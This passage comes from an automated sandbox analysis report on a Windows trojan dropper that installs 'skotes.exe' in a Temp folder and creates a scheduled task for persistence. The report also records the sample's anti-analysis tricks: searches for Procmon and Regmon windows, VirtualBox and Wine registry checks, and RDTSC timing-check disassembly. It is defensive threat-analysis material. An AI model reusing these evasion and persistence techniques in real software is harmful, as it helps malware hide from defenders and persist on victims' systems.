                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C288602_2_00C28860
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C231A82_2_00C231A8
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BE4B302_2_00BE4B30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BE4DE02_2_00BE4DE0
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C22D102_2_00C22D10
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C2779B2_2_00C2779B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C17F362_2_00C17F36
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C061926_2_00C06192
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BEE5306_2_00BEE530
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C288606_2_00C28860
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BE4B306_2_00BE4B30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C96D9A6_2_00C96D9A
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BE4DE06_2_00BE4DE0
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C22D106_2_00C22D10
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C00E136_2_00C00E13
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C270496_2_00C27049
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C231A86_2_00C231A8
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C10BC76_2_00C10BC7
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C016026_2_00C01602
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C2779B6_2_00C2779B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C278BB6_2_00C278BB
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C03DF16_2_00C03DF1
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C17F366_2_00C17F36
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BFD942 appears 85 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BFD663 appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BFD64E appears 66 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BF80C0 appears 261 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00C18E10 appears 34 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BFDF80 appears 62 times
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: String function: 002E80C0 appears 130 times
                  Source: UyiH4t5dph.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: UyiH4t5dph.exeStatic PE information: Section: ZLIB complexity 0.9980947717983651
                  Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9980947717983651
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: UyiH4t5dph.exeVirustotal: Detection: 54%
                  Source: UyiH4t5dph.exeReversingLabs: Detection: 47%
                  Source: UyiH4t5dph.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile read: C:\Users\user\Desktop\UyiH4t5dph.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\UyiH4t5dph.exe "C:\Users\user\Desktop\UyiH4t5dph.exe"
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: UyiH4t5dph.exeStatic file information: File size 2990592 > 1048576
                  Source: UyiH4t5dph.exeStatic PE information: Raw size of ascqmpzr is bigger than: 0x100000 < 0x2a8600

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeUnpacked PE file: 0.2.UyiH4t5dph.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: UyiH4t5dph.exeStatic PE information: real checksum: 0x2e8826 should be: 0x2dd7ed
                  Source: skotes.exe.0.drStatic PE information: real checksum: 0x2e8826 should be: 0x2dd7ed
                  Source: UyiH4t5dph.exeStatic PE information: section name:
                  Source: UyiH4t5dph.exeStatic PE information: section name: .idata
                  Source: UyiH4t5dph.exeStatic PE information: section name: ascqmpzr
                  Source: UyiH4t5dph.exeStatic PE information: section name: vkonyklc
                  Source: UyiH4t5dph.exeStatic PE information: section name: .taggant
                  Source: skotes.exe.0.drStatic PE information: section name:
                  Source: skotes.exe.0.drStatic PE information: section name: .idata
                  Source: skotes.exe.0.drStatic PE information: section name: ascqmpzr
                  Source: skotes.exe.0.drStatic PE information: section name: vkonyklc
                  Source: skotes.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002ED91C push ecx; ret 0_2_002ED92F
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002E1359 push es; ret 0_2_002E135A
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BFD91C push ecx; ret 2_2_00BFD92F
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C30B53 push cs; ret 6_2_00C30B56
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C30B0C push cs; ret 6_2_00C30B0E
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C30B14 push cs; ret 6_2_00C30B16
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C30B1D push cs; ret 6_2_00C30B1E
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C30B20 push cs; ret 6_2_00C30B46
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C30B2D push cs; ret 6_2_00C30B2E
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BFD91C push ecx; ret 6_2_00BFD92F
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BFDFC6 push ecx; ret 6_2_00BFDFD9
                  Source: UyiH4t5dph.exeStatic PE information: section name: entropy: 7.980946742819636
                  Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.980946742819636
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-11082
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9654
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 33F5E4 second address: 33F5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 33F5EC second address: 33F5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FE6E8B29088h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 33F5FF second address: 33EEE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ah, D9h 0x0000000d popad 0x0000000e push dword ptr [ebp+122D0EB9h] 0x00000014 mov dword ptr [ebp+122D2334h], edx 0x0000001a jns 00007FE6E8F184BCh 0x00000020 call dword ptr [ebp+122D24F1h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D24B3h], esi 0x0000002d xor eax, eax 0x0000002f ja 00007FE6E8F184C2h 0x00000035 jnc 00007FE6E8F184BCh 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f js 00007FE6E8F184BCh 0x00000045 mov dword ptr [ebp+122D2950h], edi 0x0000004b mov dword ptr [ebp+122D2950h], ecx 0x00000051 mov dword ptr [ebp+122D2C8Ch], eax 0x00000057 sub dword ptr [ebp+122D24B3h], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 mov dword ptr [ebp+122D2A2Dh], edi 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c pushad 0x0000006d or dword ptr [ebp+122D2A2Dh], ebx 0x00000073 popad 0x00000074 lodsw 0x00000076 jmp 00007FE6E8F184C6h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f add dword ptr [ebp+122D2A2Dh], eax 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 cld 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007FE6E8F184BCh 0x00000092 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4A9412 second address: 4A9429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnl 00007FE6E8B2908Eh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B78AA second address: 4B78C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007FE6E8F184C5h 0x0000000d pop ecx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B7D3A second address: 4B7D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B7D3F second address: 4B7D6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE6E8F184C9h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE6E8F184BBh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B7D6D second address: 4B7D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B7D71 second address: 4B7D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4BB5E7 second address: 4BB5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4BB5EB second address: 33EEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 2D50A466h 0x0000000e mov dword ptr [ebp+122D29FFh], eax 0x00000014 push dword ptr [ebp+122D0EB9h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FE6E8F184B8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007FE6E8F184BAh 0x00000039 call dword ptr [ebp+122D24F1h] 0x0000003f pushad 0x00000040 mov dword ptr [ebp+122D24B3h], esi 0x00000046 xor eax, eax 0x00000048 ja 00007FE6E8F184C2h 0x0000004e jnc 00007FE6E8F184BCh 0x00000054 mov edx, dword ptr [esp+28h] 0x00000058 js 00007FE6E8F184BCh 0x0000005e mov dword ptr [ebp+122D2950h], edi 0x00000064 mov dword ptr [ebp+122D2950h], ecx 0x0000006a mov dword ptr [ebp+122D2C8Ch], eax 0x00000070 sub dword ptr [ebp+122D24B3h], ecx 0x00000076 mov esi, 0000003Ch 0x0000007b mov dword ptr [ebp+122D2A2Dh], edi 0x00000081 add esi, dword ptr [esp+24h] 0x00000085 pushad 0x00000086 or dword ptr [ebp+122D2A2Dh], ebx 0x0000008c popad 0x0000008d lodsw 0x0000008f jmp 00007FE6E8F184C6h 0x00000094 add eax, dword ptr [esp+24h] 0x00000098 add dword ptr [ebp+122D2A2Dh], eax 0x0000009e mov ebx, dword ptr [esp+24h] 0x000000a2 cld 0x000000a3 push eax 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 jmp 00007FE6E8F184BCh 0x000000ab rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4BB7DF second address: 4BB7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4BB7E3 second address: 4BB80D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FE6E8F184C6h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4BBA12 second address: 4BBA3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jne 00007FE6E8B29088h 0x00000012 jmp 00007FE6E8B2908Ah 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push edi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D92A7 second address: 4D92AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D951B second address: 4D951F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D951F second address: 4D9541 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE6E8F184BEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FE6E8F184B6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B54 second address: 4D9B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
